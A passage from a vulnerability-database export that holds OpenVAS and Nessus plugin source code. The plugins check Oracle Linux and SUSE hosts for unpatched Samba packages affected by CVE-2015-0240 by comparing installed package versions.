See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123181\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:23 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0250\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0250 - samba4 security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0250\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0250.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~66.el6_6.rc4\", 
rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~66.el6_6.rc4\", 
rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:23", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0249", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123184", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123184", "title": "Oracle Linux Local Check: ELSA-2015-0249", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0249.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123184\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:25 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0249\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0249 - samba3x security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0249\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0249.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.6.23~9.el5_11\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.6.23~9.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:23", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0252", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123183", "title": "Oracle Linux Local Check: ELSA-2015-0252", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0252.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# 
Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123183\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:24 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0252\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0252 - samba security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0252\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0252.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libwbclient\", rpm:\"libwbclient~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", 
rpm:\"samba-client~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-dc\", rpm:\"samba-dc~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-dc-libs\", rpm:\"samba-dc-libs~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-pidl\", rpm:\"samba-pidl~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-test\", rpm:\"samba-test~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-test-devel\", rpm:\"samba-test-devel~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-vfs-glusterfs\", rpm:\"samba-vfs-glusterfs~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~4.1.1~38.el7_0\", 
rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-modules\", rpm:\"samba-winbind-modules~4.1.1~38.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-03T12:18:14", "bulletinFamily": "scanner", "description": "samba was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-0240: Don", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-0353-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83687", "published": "2015-05-20T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : samba (SUSE-SU-2015:0353-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0353-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83687);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : samba (SUSE-SU-2015:0353-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"samba was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-0240: Don't call talloc_free on an\n uninitialized pointer 
(bnc#917376).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=872912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=873922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=876312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=889175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=898031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=908627\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=913238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0240/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150353-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3122dc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-91=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-91=1\n\nSUSE Linux Enterprise Desktop 12 
:\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-91=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgensec0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgensec0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libregistry0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libregistry0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-raw0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-raw0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 
Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", 